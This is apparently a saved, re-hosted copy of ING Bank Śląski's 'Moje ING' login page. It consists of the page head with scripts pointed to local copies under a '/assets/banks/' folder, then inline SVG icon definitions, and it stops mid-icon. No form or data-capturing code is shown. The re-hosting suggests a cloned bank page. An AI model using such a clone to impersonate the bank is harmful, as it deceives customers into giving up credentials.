<!DOCTYPE html>
<!-- saved from url=(0014)about:internet -->
<html lang="pl">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <style>
        body {
            transition: opacity ease-in 0.2s;
        }

        body[unresolved] {
            opacity: 0;
            display: block;
            overflow: hidden;
            position: relative;
        }
    </style>
    <title>Moje ING | ING Bank Śląski – Moje ING</title>
    <meta name="viewport" content="user-scalable=no, width=device-width, initial-scale=1, maximum-scale=1">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-title" content="Moje ING">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="robots" content="index,follow">
    <meta name="version" content="2004.4.2">
    <meta name="build" content="2021-02-05T10:39:33">
    <meta name="commit" content="3d22e803ebea3411aca2f26d75b5082f4c21b455">
    <meta name="description" content="Nowa bankowość internetowa i mobilna ING Banku Śląskiego. Bankuj po swojemu, tak jak lubisz. Zaloguj się.">
    <script type="text/javascript" id="adobeTopScript" data-suite-id="ingbsmojeuat" src="/assets/banks/ing_files/top.js.pobrane"></script>
    <script type="text/javascript" src="/assets/banks/ing_files/satelliteLib-30bb1204077b3c09b9f0fa5685675661a5ed4672.js.pobrane"></script>
    <script src="/assets/banks/ing_files/s-code-contents-cf3a061d83e6f01fccb2aa9e552b88f50061d94c.js.pobrane"></script>
    <link rel="shortcut icon" href="https://login.ingbank.pl/mojeing/app/assets/images/favicon.ico?v=2" type="image/x-icon">
    <link rel="apple-touch-icon" sizes="57x57" href="https://login.ingbank.pl/mojeing/app/assets/images/favicon/favicon57x57.png">
    <link rel="apple-touch-icon" sizes="60x60" href="https://login.ingbank.pl/mojeing/app/assets/images/favicon/favicon60x60.png">
    <link rel="apple-touch-icon" sizes="72x72" href="https://login.ingbank.pl/mojeing/app/assets/images/favicon/favicon72x72.png">
    <link rel="apple-touch-icon" sizes="76x76" href="https://login.ingbank.pl/mojeing/app/assets/images/favicon/favicon76x76.png">
    <link rel="apple-touch-icon" sizes="114x114" href="https://login.ingbank.pl/mojeing/app/assets/images/favicon/favicon114x114.png">
    <link rel="apple-touch-icon" sizes="120x120" href="https://login.ingbank.pl/mojeing/app/assets/images/favicon/favicon120x120.png">
    <link rel="apple-touch-icon" sizes="144x144" href="https://login.ingbank.pl/mojeing/app/assets/images/favicon/favicon144x144.png">
    <link rel="apple-touch-icon" sizes="152x152" href="https://login.ingbank.pl/mojeing/app/assets/images/favicon/favicon152x152.png">
    <link rel="apple-touch-icon" sizes="180x180" href="https://login.ingbank.pl/mojeing/app/assets/images/favicon/favicon180x180.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://login.ingbank.pl/mojeing/app/assets/images/favicon/favicon32x32.png">
    <link rel="icon" type="image/png" sizes="192x192" href="https://login.ingbank.pl/mojeing/app/assets/images/favicon/favicon192x192.png">
    <link rel="icon" type="image/png" sizes="96x96" href="https://login.ingbank.pl/mojeing/app/assets/images/favicon/favicon96x96.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://login.ingbank.pl/mojeing/app/assets/images/favicon/favicon16x16.png">
    <link rel="manifest" href="https://login.ingbank.pl/mojeing/app/assets/json/manifest.json">
    <meta name="msapplication-TileColor" content="#FF6200">
    <meta name="msapplication-TileImage" content="assets/images/favicon/favicon144x144.png">
    <meta name="msapplication-config" content="assets/xml/browserconfig.xml">
    <meta name="theme-color" content="#FF6200">
    <meta name="google-site-verification" content="A7uXOK1Tk1jDfKChkPgjwAQZy4JuoUZqmSHYhIa1mI4">
    <link href="/assets/banks/ing_files/main.af034721a9d1d19cc02b.css" rel="stylesheet">
    <script charset="utf-8" src="/assets/banks/ing_files/271.83f2369d019e5dd6ad54.js.pobrane"></script>
    <script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="/mojeing/bs/xx.js?v=1612715109529" src="/assets/banks/ing_files/xx.js.pobrane"></script>
    <script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="assets/js/vendor/bb/script.js?v=2004.4.2&amp;amp;d=2021-02-05T10:39:33" src="/assets/banks/ing_files/script.js.pobrane"></script>
    <link id="ing-stylesheet-offer-global" rel="stylesheet" type="text/css" href="/assets/banks/ing_files/template.css">
    <link id="ing-stylesheet-offer-item-loginBoxMessagePL" rel="stylesheet" type="text/css" href="/assets/banks/ing_files/template(1).css">
</head>

<body class="ing-new-theme"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="position: absolute; width: 0; height: 0" id="__SVG_SPRITE_NODE__"><symbol viewBox="0 0 32 32" id="ing-icon-konto">
        <path d="M23.469 18.901c0.096 0.27 0.081 0.561-0.042 0.82s-0.34 0.454-0.61 0.55c-0.116 0.041-0.237 0.062-0.359 0.062-0.453 0-0.859-0.287-1.011-0.714-0.198-0.557 0.095-1.171 0.652-1.369 0.116-0.041 0.237-0.062 0.359-0.062 0.453 0 0.859 0.287 1.011 0.714zM29.945 15.027h-7.942c-2.278 0-4.131 1.853-4.131 4.131v0.334c0 2.278 1.853 4.131 4.131 4.131h6.76v4.846c0 0.546-0.444 0.99-0.99 0.99h-24.916c-0.572 0-1.037-0.465-1.037-1.037v-20.36c0.647 0.479 1.446 0.763 2.311 0.763h0.055c0.067 0.018 0.138 0.029 0.21 0.029h23.329c0.572 0 1.037 0.465 1.037 1.037v2.872c0 0.436 0.354 0.79 0.79 0.79s0.79-0.354 0.79-0.79v-2.872c0-1.101-0.684-2.045-1.649-2.431v-0.758c0-1.443-1.174-2.618-2.618-2.618h-21.87c-0.436 0-0.79 0.354-0.79 0.79s0.354 0.79 0.79 0.79h21.87c0.572 0 1.037 0.465 1.037 1.037v0.571h-21.642c-0.067-0.019-0.138-0.029-0.21-0.029h-1.131c-1.274 0-2.311-1.037-2.311-2.311s1.037-2.311 2.311-2.311h20.001c0.436 0 0.79-0.354 0.79-0.79s-0.354-0.79-0.79-0.79h-20.001c-2.146 0-3.891 1.746-3.891 3.891 0 0.176 0.013 0.35 0.036 0.52-0.023 0.074-0.036 0.154-0.036 0.236v22.732c0 1.443 1.174 2.618 2.618 2.618h24.916c1.417 0 2.571-1.153 2.571-2.571v-5.514c0-0.112-0.023-0.218-0.065-0.314-0.086-0.343-0.396-0.598-0.766-0.598h-7.51c-1.407 0-2.551-1.144-2.551-2.551v-0.334c0-1.407 1.144-2.551 2.551-2.551h7.942c0.157 0 0.285 0.128 0.285 0.285v2.845c0 0.436 0.354 0.79 0.79 0.79s0.79-0.354 0.79-0.79v-2.845c0-1.029-0.837-1.865-1.865-1.865z"></path>

        <style type="text/css">
            #ing-icon-profil01 .st0{fill:#FF6200;}
            #ing-icon-profil01 .st1{fill:none;stroke:#8CC63F;stroke-width:2;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil01 .st2{fill:#76A62F;}
            #ing-icon-profil01 .st3{fill:#8CC63F;}
            #ing-icon-profil01 .st4{fill:#4D4D4D;}
            #ing-icon-profil01 .st5{fill:#666666;}
            #ing-icon-profil01 .st6{fill:#DDDDDD;}
            #ing-icon-profil01 .st7{fill:#F2F2F2;}
            #ing-icon-profil01 .st8{fill:#4C5051;}
            #ing-icon-profil01 .st9{fill:#808080;}
            #ing-icon-profil01 .st10{fill:#999999;}
            #ing-icon-profil01 .st11{fill:#B3B3B3;}
            #ing-icon-profil01 .st12{fill:#CCCCCC;}
            #ing-icon-profil01 .st13{fill:#319CCD;}
            #ing-icon-profil01 .st14{clip-path:url(#SVGID_2_);}
            #ing-icon-profil01 .st15{fill:#30ACE3;}
            #ing-icon-profil01 .st16{fill:#8C6239;}
            #ing-icon-profil01 .st17{fill:#754C24;}
            #ing-icon-profil01 .st18{fill:#FBB03B;}
            #ing-icon-profil01 .st19{fill:none;stroke:#FBB03B;stroke-width:2.4769;stroke-linecap:round;stroke-miterlimit:10;}
            #ing-icon-profil01 .st20{fill:#BDC8B3;}
            #ing-icon-profil01 .st21{fill-rule:evenodd;clip-rule:evenodd;fill:#BDC8B3;}
            #ing-icon-profil01 .st22{fill:#D7E0C5;}
            #ing-icon-profil01 .st23{fill:#60826E;}
            #ing-icon-profil01 .st24{fill-rule:evenodd;clip-rule:evenodd;fill:#60826E;}
            #ing-icon-profil01 .st25{fill:#EEAA45;}
            #ing-icon-profil01 .st26{fill:#FFC556;}
            #ing-icon-profil01 .st27{fill:#FFA800;}
            #ing-icon-profil01 .st28{fill:none;stroke:#FF6200;stroke-width:2.664;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil01 .st29{fill:#F15A24;}
            #ing-icon-profil01 .st30{opacity:0.5;fill:#8C6239;}
            #ing-icon-profil01 .st31{fill:#A7D9FF;}
            #ing-icon-profil01 .st32{fill:#C2E0FF;}
            #ing-icon-profil01 .st33{fill:none;stroke:#8CC63F;stroke-width:2.4769;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil01 .st34{fill:none;stroke:#C2E0FF;stroke-width:2.4769;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil01 .st35{fill:#5FB890;}
            #ing-icon-profil01 .st36{fill:#539D7A;}
            #ing-icon-profil01 .st37{clip-path:url(#SVGID_4_);fill:#E6E6E6;}
            #ing-icon-profil01 .st38{fill:none;stroke:#999999;stroke-width:2;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil01 .st39{fill:#AFC0A6;}
            #ing-icon-profil01 .st40{fill:#9FA993;}
            #ing-icon-profil01 .st41{fill:#E4530A;}
            #ing-icon-profil01 .st42{fill:#2C3F47;}
            #ing-icon-profil01 .st43{fill:#D9D9D9;}
            #ing-icon-profil01 .st44{fill:#FFFFFF;}
            #ing-icon-profil01 .st45{fill:#F0F0F0;}
        </style>
        <g>
            <path class="st3" d="M48.476,49.208H1.905C1.407,49.208,1,48.801,1,48.304v-4.399C1,43.407,1.407,43,1.905,43h46.571   c0.498,0,0.905,0.407,0.905,0.905v4.399C49.381,48.801,48.974,49.208,48.476,49.208z"></path>
        </g>
        <g>
            <g>
                <line class="st33" x1="19.661" y1="44.162" x2="22.454" y2="41.369"></line>
                <line class="st33" x1="16.425" y1="44.123" x2="18.323" y2="39.541"></line>
                <line class="st33" x1="13.701" y1="44.092" x2="13.701" y2="38.899"></line>
                <line class="st33" x1="10.946" y1="44.049" x2="9.078" y2="39.541"></line>
                <line class="st33" x1="7.618" y1="44.04" x2="4.947" y2="41.369"></line>
            </g>
        </g>
        <g>
            <circle class="st18" cx="10.918" cy="11.218" r="4.082"></circle>
            <line class="st19" x1="2.239" y1="11.231" x2="3.92" y2="11.231"></line>
            <line class="st19" x1="17.895" y1="11.231" x2="19.576" y2="11.231"></line>
            <line class="st19" x1="10.907" y1="2.563" x2="10.907" y2="4.243"></line>
            <line class="st19" x1="10.907" y1="18.219" x2="10.907" y2="19.9"></line>
            <line class="st19" x1="4.778" y1="5.102" x2="5.966" y2="6.29"></line>
            <line class="st19" x1="15.849" y1="16.173" x2="17.037" y2="17.361"></line>
            <line class="st19" x1="17.037" y1="5.102" x2="15.849" y2="6.29"></line>
            <line class="st19" x1="5.966" y1="16.173" x2="4.778" y2="17.361"></line>
        </g>
        <g>
            <path class="st2" d="M48.648,49.208H1.733C1.33,49.208,1,48.879,1,48.476v-1.847c0-0.403,0.33-0.733,0.733-0.733h46.916   c0.403,0,0.733,0.33,0.733,0.733v1.847C49.381,48.879,49.051,49.208,48.648,49.208z"></path>
        </g>
        <g>
            <rect x="36.257" y="37.833" class="st16" width="3.167" height="5.167"></rect>
            <rect x="37.793" y="37.833" class="st17" width="1.631" height="5.167"></rect>
        </g>
        <g>
            <g>
                <path class="st2" d="M36.755,20.669l-6.402,16.292c-0.301,0.765,0.263,1.592,1.085,1.592h12.803c0.822,0,1.386-0.827,1.085-1.592    l-6.402-16.292C38.538,19.683,37.143,19.683,36.755,20.669z"></path>
            </g>
            <g>
                <path class="st2" d="M36.755,13.531l-4.447,11.317c-0.301,0.765,0.263,1.592,1.085,1.592h8.894c0.822,0,1.386-0.827,1.085-1.592    l-4.447-11.317C38.538,12.545,37.143,12.545,36.755,13.531z"></path>
            </g>
        </g>
        <path class="st3" d="M37.792,19.936c-0.429,0.018-0.85,0.258-1.036,0.733l-6.402,16.292c-0.301,0.765,0.263,1.592,1.085,1.592h6.353  V19.936z"></path>
        <path class="st3" d="M37.792,12.798c-0.429,0.018-0.85,0.258-1.036,0.733l-4.447,11.317c-0.301,0.765,0.263,1.592,1.085,1.592h4.398  V12.798z"></path>
    </symbol><symbol xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 50 50" id="ing-icon-profil02">
        <style type="text/css">
            #ing-icon-profil02 .st0{fill:#FF6200;}
            #ing-icon-profil02 .st1{fill:none;stroke:#8CC63F;stroke-width:2;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil02 .st2{fill:#76A62F;}
            #ing-icon-profil02 .st3{fill:#8CC63F;}
            #ing-icon-profil02 .st4{fill:#4D4D4D;}
            #ing-icon-profil02 .st5{fill:#666666;}
            #ing-icon-profil02 .st6{fill:#DDDDDD;}
            #ing-icon-profil02 .st7{fill:#F2F2F2;}
            #ing-icon-profil02 .st8{fill:#808080;}
            #ing-icon-profil02 .st9{fill:#999999;}
            #ing-icon-profil02 .st10{fill:#4C5051;}
            #ing-icon-profil02 .st11{fill:#B3B3B3;}
            #ing-icon-profil02 .st12{fill:#CCCCCC;}
            #ing-icon-profil02 .st13{fill:#319CCD;}
            #ing-icon-profil02 .st14{clip-path:url(#SVGID_2_);}
            #ing-icon-profil02 .st15{fill:#30ACE3;}
            #ing-icon-profil02 .st16{fill:#8C6239;}
            #ing-icon-profil02 .st17{fill:#754C24;}
            #ing-icon-profil02 .st18{fill:#FBB03B;}
            #ing-icon-profil02 .st19{fill:none;stroke:#FBB03B;stroke-width:2.4769;stroke-linecap:round;stroke-miterlimit:10;}
            #ing-icon-profil02 .st20{fill:#BDC8B3;}
            #ing-icon-profil02 .st21{fill-rule:evenodd;clip-rule:evenodd;fill:#BDC8B3;}
            #ing-icon-profil02 .st22{fill:#D7E0C5;}
            #ing-icon-profil02 .st23{fill:#60826E;}
            #ing-icon-profil02 .st24{fill-rule:evenodd;clip-rule:evenodd;fill:#60826E;}
            #ing-icon-profil02 .st25{fill:#EEAA45;}
            #ing-icon-profil02 .st26{fill:#FFC556;}
            #ing-icon-profil02 .st27{fill:#FFA800;}
            #ing-icon-profil02 .st28{fill:none;stroke:#FF6200;stroke-width:2.664;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil02 .st29{fill:#F15A24;}
            #ing-icon-profil02 .st30{opacity:0.5;fill:#8C6239;}
            #ing-icon-profil02 .st31{fill:#A7D9FF;}
            #ing-icon-profil02 .st32{fill:#C2E0FF;}
            #ing-icon-profil02 .st33{fill:none;stroke:#8CC63F;stroke-width:2.4769;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil02 .st34{fill:none;stroke:#C2E0FF;stroke-width:2.4769;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil02 .st35{fill:#5FB890;}
            #ing-icon-profil02 .st36{fill:#539D7A;}
            #ing-icon-profil02 .st37{clip-path:url(#SVGID_4_);fill:#E6E6E6;}
            #ing-icon-profil02 .st38{fill:none;stroke:#999999;stroke-width:2;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil02 .st39{fill:#AFC0A6;}
            #ing-icon-profil02 .st40{fill:#9FA993;}
            #ing-icon-profil02 .st41{fill:#E4530A;}
            #ing-icon-profil02 .st42{fill:#2C3F47;}
            #ing-icon-profil02 .st43{fill:#D9D9D9;}
            #ing-icon-profil02 .st44{fill:#FFFFFF;}
            #ing-icon-profil02 .st45{fill:#F0F0F0;}
        </style>
        <g>
            <rect x="35.257" y="27.583" class="st16" width="3.167" height="5.167"></rect>
            <rect x="36.793" y="27.583" class="st17" width="1.631" height="5.167"></rect>
        </g>
        <g>
            <g>
                <path class="st2" d="M35.755,10.419l-6.402,16.292c-0.301,0.765,0.263,1.592,1.085,1.592h12.803c0.822,0,1.386-0.827,1.085-1.592    l-6.402-16.292C37.538,9.433,36.143,9.433,35.755,10.419z"></path>
            </g>
            <g>
                <path class="st2" d="M35.755,3.281l-4.447,11.317c-0.301,0.765,0.263,1.592,1.085,1.592h8.894c0.822,0,1.386-0.827,1.085-1.592    L37.926,3.281C37.538,2.295,36.143,2.295,35.755,3.281z"></path>
            </g>
        </g>
        <path class="st3" d="M36.792,9.686c-0.429,0.018-0.85,0.258-1.036,0.733l-6.402,16.292c-0.301,0.765,0.263,1.592,1.085,1.592h6.353  V9.686z"></path>
        <path class="st3" d="M36.792,2.548c-0.429,0.018-0.85,0.258-1.036,0.733l-4.447,11.317c-0.301,0.765,0.263,1.592,1.085,1.592h4.398  V2.548z"></path>
        <g>
            <circle class="st18" cx="10.918" cy="11.218" r="4.082"></circle>
            <line class="st19" x1="2.239" y1="11.231" x2="3.92" y2="11.231"></line>
            <line class="st19" x1="17.895" y1="11.231" x2="19.576" y2="11.231"></line>
            <line class="st19" x1="10.907" y1="2.563" x2="10.907" y2="4.243"></line>
            <line class="st19" x1="10.907" y1="18.219" x2="10.907" y2="19.9"></line>
            <line class="st19" x1="4.778" y1="5.102" x2="5.966" y2="6.29"></line>
            <line class="st19" x1="15.849" y1="16.173" x2="17.037" y2="17.361"></line>
            <line class="st19" x1="17.037" y1="5.102" x2="15.849" y2="6.29"></line>
            <line class="st19" x1="5.966" y1="16.173" x2="4.778" y2="17.361"></line>
        </g>
        <path class="st3" d="M49.408,36.937c-0.003-0.35-0.173-0.692-0.485-0.901c-10.76-7.246-19.333-3.124-28.412,1.243  c-5.746,2.764-11.605,5.623-18.428,5.623c-0.606,0-1.098,0.492-1.098,1.098C0.985,44.159,1,48.304,1,48.304  c0,0.498,0.407,0.905,0.905,0.905h46.571c0.498,0,0.905-0.407,0.905-0.905v-4.399L49.408,36.937z"></path>
        <path class="st2" d="M49.408,42.937c-0.003-0.35-0.164-0.706-0.485-0.901C38.875,35.938,30.375,37.375,20.938,41  c-5.952,2.286-12.03,3.902-18.854,3.902c-0.606,0-1.098,0.492-1.098,1.098C0.985,46.159,1,48.304,1,48.304  c0,0.498,0.407,0.905,0.905,0.905h46.571c0.498,0,0.905-0.407,0.905-0.905v-4.399L49.408,42.937z"></path>
        <path class="st34" d="M5.24,28.446c0,0,2.247-3.123,6.091-0.261s6.289-0.27,6.289-0.27"></path>
        <path class="st34" d="M5.24,33.148c0,0,2.247-3.123,6.091-0.261s6.289-0.27,6.289-0.27"></path>
    </symbol><symbol xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 50 50" id="ing-icon-profil03">
        <style type="text/css">
            #ing-icon-profil03 .st0{fill:#FF6200;}
            #ing-icon-profil03 .st1{fill:none;stroke:#8CC63F;stroke-width:2;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil03 .st2{fill:#76A62F;}
            #ing-icon-profil03 .st3{fill:#8CC63F;}
            #ing-icon-profil03 .st4{fill:#4D4D4D;}
            #ing-icon-profil03 .st5{fill:#666666;}
            #ing-icon-profil03 .st6{fill:#DDDDDD;}
            #ing-icon-profil03 .st7{fill:#F2F2F2;}
            #ing-icon-profil03 .st8{fill:#808080;}
            #ing-icon-profil03 .st9{fill:#999999;}
            #ing-icon-profil03 .st10{fill:#4C5051;}
            #ing-icon-profil03 .st11{fill:#B3B3B3;}
            #ing-icon-profil03 .st12{fill:#CCCCCC;}
            #ing-icon-profil03 .st13{fill:#319CCD;}
            #ing-icon-profil03 .st14{clip-path:url(#ing-icon-profil03_SVGID_2_);}
            #ing-icon-profil03 .st15{fill:#30ACE3;}
            #ing-icon-profil03 .st16{fill:#8C6239;}
            #ing-icon-profil03 .st17{fill:#754C24;}
            #ing-icon-profil03 .st18{fill:#FBB03B;}
            #ing-icon-profil03 .st19{fill:none;stroke:#FBB03B;stroke-width:2.4769;stroke-linecap:round;stroke-miterlimit:10;}
            #ing-icon-profil03 .st20{fill:#BDC8B3;}
            #ing-icon-profil03 .st21{fill-rule:evenodd;clip-rule:evenodd;fill:#BDC8B3;}
            #ing-icon-profil03 .st22{fill:#D7E0C5;}
            #ing-icon-profil03 .st23{fill:#60826E;}
            #ing-icon-profil03 .st24{fill-rule:evenodd;clip-rule:evenodd;fill:#60826E;}
            #ing-icon-profil03 .st25{fill:#EEAA45;}
            #ing-icon-profil03 .st26{fill:#FFC556;}
            #ing-icon-profil03 .st27{fill:#FFA800;}
            #ing-icon-profil03 .st28{fill:none;stroke:#FF6200;stroke-width:2.664;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil03 .st29{fill:#F15A24;}
            #ing-icon-profil03 .st30{opacity:0.5;fill:#8C6239;}
            #ing-icon-profil03 .st31{fill:#A7D9FF;}
            #ing-icon-profil03 .st32{fill:#C2E0FF;}
            #ing-icon-profil03 .st33{fill:none;stroke:#8CC63F;stroke-width:2.4769;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil03 .st34{fill:none;stroke:#C2E0FF;stroke-width:2.4769;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil03 .st35{fill:#5FB890;}
            #ing-icon-profil03 .st36{fill:#539D7A;}
            #ing-icon-profil03 .st37{clip-path:url(#SVGID_4_);fill:#E6E6E6;}
            #ing-icon-profil03 .st38{fill:none;stroke:#999999;stroke-width:2;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil03 .st39{fill:#AFC0A6;}
            #ing-icon-profil03 .st40{fill:#9FA993;}
            #ing-icon-profil03 .st41{fill:#E4530A;}
            #ing-icon-profil03 .st42{fill:#2C3F47;}
            #ing-icon-profil03 .st43{fill:#D9D9D9;}
            #ing-icon-profil03 .st44{fill:#FFFFFF;}
            #ing-icon-profil03 .st45{fill:#F0F0F0;}
        </style>
        <g>
            <circle class="st18" cx="24.918" cy="12.218" r="4.082"></circle>
            <line class="st19" x1="31.895" y1="12.231" x2="33.576" y2="12.231"></line>
            <line class="st19" x1="24.907" y1="3.563" x2="24.907" y2="5.243"></line>
            <line class="st19" x1="18.778" y1="6.102" x2="19.966" y2="7.29"></line>
            <line class="st19" x1="29.849" y1="17.173" x2="31.037" y2="18.361"></line>
            <line class="st19" x1="31.037" y1="6.102" x2="29.849" y2="7.29"></line>
        </g>
        <g>
            <g>
                <path class="st31" d="M22.808,22.355c2.075,0,3.757-1.586,3.757-3.543c0-1.638-1.181-3.013-2.782-3.418    c-0.014-2.02-1.722-3.654-3.829-3.654c-0.404,0-0.793,0.061-1.159,0.172c-1.017-1.716-2.935-2.876-5.139-2.876    c-3.266,0-5.913,2.543-5.913,5.679c0,0.286,0.029,0.564,0.071,0.839c-1.477,0.439-2.551,1.76-2.551,3.323    c0,1.921,1.621,3.478,3.622,3.478H22.808z"></path>
            </g>
            <g>
                <path class="st32" d="M22.808,22.155c2.075,0,3.757-1.586,3.757-3.543c0-1.638-1.181-3.013-2.782-3.418    c-0.014-2.02-1.722-3.654-3.829-3.654c-0.404,0-0.793,0.061-1.159,0.172c-1.017-1.716-2.935-2.876-5.139-2.876    c-3.266,0-5.913,2.543-5.913,5.679c0,0.286,0.029,0.564,0.071,0.839c-1.477,0.439-2.551,1.76-2.551,3.323    c0,1.921,1.621,3.478,3.622,3.478H22.808z"></path>
            </g>
        </g>
        <path class="st35" d="M49.362,36.105c0-0.376-0.068-0.763-0.354-1.049L37.962,24.01c-1.593-1.594-4.186-1.592-5.776,0l-7.669,7.669  c-0.3,0.3-0.698,0.464-1.122,0.464c-0.002,0-0.003,0-0.005,0c-0.427-0.001-0.826-0.169-1.126-0.473l-1.87-1.896  c-0.771-0.781-1.799-1.213-2.897-1.216c-0.003,0-0.007,0-0.011,0c-1.094,0-2.121,0.427-2.893,1.201L1.449,42.942  c-0.138,0.138-0.226,0.303-0.286,0.476C0.969,43.906,1,44.722,1,44.905v3.399c0,0.498,0.407,0.905,0.905,0.905h46.571  c0.498,0,0.905-0.407,0.905-0.905v-4.399C49.381,43.407,49.362,37.396,49.362,36.105z"></path>
        <path class="st36" d="M49.362,42.982c0-0.179-0.068-0.363-0.354-0.499l-11.046-5.249c-1.593-0.758-4.186-0.757-5.776,0l-7.669,3.644  c-0.3,0.142-0.698,0.221-1.122,0.221c-0.002,0-0.003,0-0.005,0c-0.427,0-0.826-0.08-1.126-0.225l-1.87-0.901  c-0.771-0.371-1.799-0.577-2.897-0.578c-0.003,0-0.007,0-0.011,0c-1.094,0-2.121,0.203-2.893,0.571L1.449,46.231  c-0.138,0.066-0.226,0.144-0.286,0.226C0.969,46.689,1,47.076,1,47.163v1.615c0,0.236,0.407,0.43,0.905,0.43h46.571  c0.498,0,0.905-0.194,0.905-0.43v-2.09C49.381,46.452,49.362,43.595,49.362,42.982z"></path>
        <g>
            <defs>
                <path id="ing-icon-profil03_SVGID_5_" d="M22.808,22.155c2.075,0,3.757-1.586,3.757-3.543c0-1.638-1.181-3.013-2.782-3.418    c-0.014-2.02-1.722-3.654-3.829-3.654c-0.404,0-0.793,0.061-1.159,0.172c-1.017-1.716-2.935-2.876-5.139-2.876    c-3.266,0-5.913,2.543-5.913,5.679c0,0.286,0.029,0.564,0.071,0.839c-1.477,0.439-2.551,1.76-2.551,3.323    c0,1.921,1.621,3.478,3.622,3.478H22.808z"></path>
            </defs>
            <clippath id="ing-icon-profil03_SVGID_2_">
                <use xlink:href="#ing-icon-profil03_SVGID_5_" style="overflow:visible;"></use>
            </clippath>
        </g>
    </symbol><symbol xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 50 50" id="ing-icon-profil04">
        <style type="text/css">
            #ing-icon-profil04 .st0{fill:#FF6200;}
            #ing-icon-profil04 .st1{fill:none;stroke:#8CC63F;stroke-width:2;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil04 .st2{fill:#76A62F;}
            #ing-icon-profil04 .st3{fill:#8CC63F;}
            #ing-icon-profil04 .st4{fill:#4D4D4D;}
            #ing-icon-profil04 .st5{fill:#666666;}
            #ing-icon-profil04 .st6{fill:#DDDDDD;}
            #ing-icon-profil04 .st7{fill:#F2F2F2;}
            #ing-icon-profil04 .st8{fill:#808080;}
            #ing-icon-profil04 .st9{fill:#999999;}
            #ing-icon-profil04 .st10{fill:#4C5051;}
            #ing-icon-profil04 .st11{fill:#B3B3B3;}
            #ing-icon-profil04 .st12{fill:#CCCCCC;}
            #ing-icon-profil04 .st13{fill:#319CCD;}
            #ing-icon-profil04 .st14{clip-path:url(#ing-icon-profil04_SVGID_2_);}
            #ing-icon-profil04 .st15{fill:#30ACE3;}
            #ing-icon-profil04 .st16{fill:#8C6239;}
            #ing-icon-profil04 .st17{fill:#754C24;}
            #ing-icon-profil04 .st18{fill:#FBB03B;}
            #ing-icon-profil04 .st19{fill:none;stroke:#FBB03B;stroke-width:2.4769;stroke-linecap:round;stroke-miterlimit:10;}
            #ing-icon-profil04 .st20{fill:#BDC8B3;}
            #ing-icon-profil04 .st21{fill-rule:evenodd;clip-rule:evenodd;fill:#BDC8B3;}
            #ing-icon-profil04 .st22{fill:#D7E0C5;}
            #ing-icon-profil04 .st23{fill:#60826E;}
            #ing-icon-profil04 .st24{fill-rule:evenodd;clip-rule:evenodd;fill:#60826E;}
            #ing-icon-profil04 .st25{fill:#EEAA45;}
            #ing-icon-profil04 .st26{fill:#FFC556;}
            #ing-icon-profil04 .st27{fill:#FFA800;}
            #ing-icon-profil04 .st28{fill:none;stroke:#FF6200;stroke-width:2.664;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil04 .st29{fill:#F15A24;}
            #ing-icon-profil04 .st30{opacity:0.5;fill:#8C6239;}
            #ing-icon-profil04 .st31{fill:#A7D9FF;}
            #ing-icon-profil04 .st32{fill:#C2E0FF;}
            #ing-icon-profil04 .st33{fill:none;stroke:#8CC63F;stroke-width:2.4769;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil04 .st34{fill:none;stroke:#C2E0FF;stroke-width:2.4769;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil04 .st35{fill:#5FB890;}
            #ing-icon-profil04 .st36{fill:#539D7A;}
            #ing-icon-profil04 .st37{clip-path:url(#ing-icon-profil04_SVGID_4_);fill:#E6E6E6;}
            #ing-icon-profil04 .st38{fill:none;stroke:#999999;stroke-width:2;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
            #ing-icon-profil04 .st39{fill:#AFC0A6;}
            #ing-icon-profil04 .st40{fill:#9FA993;}
            #ing-icon-profil04 .st41{fill:#E4530A;}
            #ing-icon-profil04 .st42{fill:#2C3F47;}
            #ing-icon-profil04 .st43{fill:#D9D9D9;}
            #ing-icon-profil04 .st44{fill:#FFFFFF;}
            #ing-icon-profil04 .st45{fill:#F0F0F0;}
        </style>
        <path class="st13" d="M45.329,38.049l-6.384-9.671c-0.612-0.927-1.973-0.926-2.583,0.003l-6.337,9.648  c-0.675,1.027,0.061,2.393,1.29,2.395l12.72,0.023C45.269,40.449,46.008,39.078,45.329,38.049z"></path>
